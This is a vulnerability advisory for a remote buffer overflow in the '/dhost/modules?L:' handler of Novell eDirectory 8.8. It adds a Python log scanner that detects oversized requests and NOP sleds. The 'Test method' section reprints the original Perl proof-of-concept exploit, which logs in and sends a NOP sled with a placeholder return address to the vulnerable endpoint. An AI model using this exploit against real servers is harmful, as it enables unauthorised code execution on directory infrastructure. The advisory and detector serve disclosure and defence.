Novell eDirectory '/dhost/modules?L:' Buffer Overflow Vulnerability

Cause
Boundary condition error
 
Affected systems
Novell eDirectory 8.8.2 ftf2
Novell eDirectory 8.8.2
Novell eDirectory 8.8.1
Novell eDirectory 8.8 SP5
Novell eDirectory 8.8 SP4 FTF1
Novell eDirectory 8.8 SP4
Novell eDirectory 8.8 SP3 FTF3
Novell eDirectory 8.8 SP3
Novell eDirectory 8.8 SP2
Novell eDirectory 8.8 SP1
Novell eDirectory 8.8
 
Unaffected systems
 
Impact
A remote attacker can exploit this vulnerability to execute arbitrary instructions with the privileges of the application.
 
Attack prerequisites
The attacker must have access to Novell eDirectory.
 
Vulnerability details
Novell eDirectory is a cross-platform directory server.
The dhost module of Novell eDirectory contains a buffer overflow; a remote attacker can exploit it to execute arbitrary instructions with the privileges of the application.
A malformed HTTP GET request to /dhost/modules?L: triggers the buffer overflow; successful exploitation allows arbitrary code execution.
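The overflow is triggered by an oversized argument after /dhost/modules?L:, so the simplest defensive check is to watch the HTTP access log for that endpoint and flag requests whose argument is unreasonably long or contains non-printable bytes. The following is an added example written for this page, not code from the advisory or from Novell; the log format (Common Log Format), the sample log lines, the 256-byte threshold and the function names are all assumptions made for the example.

```python
"""Flag oversized requests to the eDirectory '/dhost/modules?L:' endpoint
in a Common Log Format access log (added example, not part of the advisory)."""
import re
from urllib.parse import unquote_to_bytes

# Common Log Format: host ident user [time] "METHOD TARGET PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

ENDPOINT = "/dhost/modules?L:"
# Assumed threshold for this example: a legitimate module argument is short,
# while the advisory's PoC sends roughly 1900 bytes after "modules?L:".
MAX_ARG_LEN = 256


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_target(target):
    """Return the reasons a request target looks like an overflow attempt
    against the vulnerable endpoint (empty list means nothing suspicious)."""
    reasons = []
    if not target.startswith(ENDPOINT):
        return reasons
    # Decode percent-escapes so encoded and raw payload bytes are judged alike
    arg = unquote_to_bytes(target[len(ENDPOINT):])
    if len(arg) > MAX_ARG_LEN:
        reasons.append(f"argument length {len(arg)} > {MAX_ARG_LEN}")
    if b"\x90" * 16 in arg:
        reasons.append("NOP sled (run of 0x90 bytes)")
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("non-printable bytes in argument")
    return reasons


def scan(lines):
    """Return (host, time, truncated target, reasons) for every suspicious line."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = inspect_target(rec["target"])
        if reasons:
            hits.append((rec["host"], rec["time"], rec["target"][:40], reasons))
    return hits


# Constructed sample log: two benign requests and one shaped like the PoC
# (1668 encoded NOP bytes, a 4-byte return address, 235 filler bytes).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Nov/2009:10:00:01 +0000] "GET /dhost/modules?L: HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Nov/2009:10:00:05 +0000] "GET /nds HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Nov/2009:10:02:13 +0000] "GET ' + ENDPOINT
    + "%90" * 1668 + "%EF%BE%AD%DE" + "B" * 235 + ' HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for host, when, target, reasons in scan(SAMPLE_LOG):
        print(f"{host} {when} {target}... -> {'; '.join(reasons)}")
```

Run it over the real access log by replacing SAMPLE_LOG with the file's lines; the length check alone is enough to catch the PoC shape, while the NOP-sled and non-printable checks reduce false positives from merely long but legitimate arguments.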
 
Test method
#PoC for Vulnerability:
#!/usr/bin/perl
#Novell eDirectory 8.8 SP5 BoF Vuln – 0day
#Vulnerability found in Hellcode Labs.
#karak0rsan || murderkey
#info[at]hellcode.net || www.hellcode.net
#to GamaSEC: "please continue to discover and publish XSS BUGS.. you can just do that ;)"
#http://www.youtube.com/watch?v=6bloyjV-Hhs
use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;
$target=$ARGV[0];
if(!$ARGV[0]){
        print "Novell eDirectory 8.8 SP5 Exploit\n";
        print "Hellcode Research || Hellcode.net\n";
        print "Usage:perl $0 [target]\n";
        exit();
}
$login_url = "$target/_LOGIN_SERVER_";
$url = "$target/dhost/";
$vuln = "modules?L:";
$nop = "\x90" x 1668;        # NOP sled
$eip = "\xef\xbe\xad\xde";   # return-address placeholder
$data = "B" x 235;           # filler
$hellcode = $vuln.$nop.$eip.$data;
########Write your usr and pwd########
$username = "Admin.context";
$password = "1234";
my $mechanize = WWW::Mechanize->new();
# $cookie_file and $url_timeout are never assigned in the original PoC
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file", autosave => 1));
$mechanize->timeout($url_timeout);
$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));
$mechanize->submit_form(
        form_name => "authenticator",
        fields    => {
                usr => $username,
                pwd => $password},
        button => 'Login');
$response2 = $mechanize->get("$url$hellcode");
 
Vendor solution
No detailed solution is currently available:
http://www.novell.com/products/edirectory/
 
Credit
karak0rsan and murderkey from Hellcode Research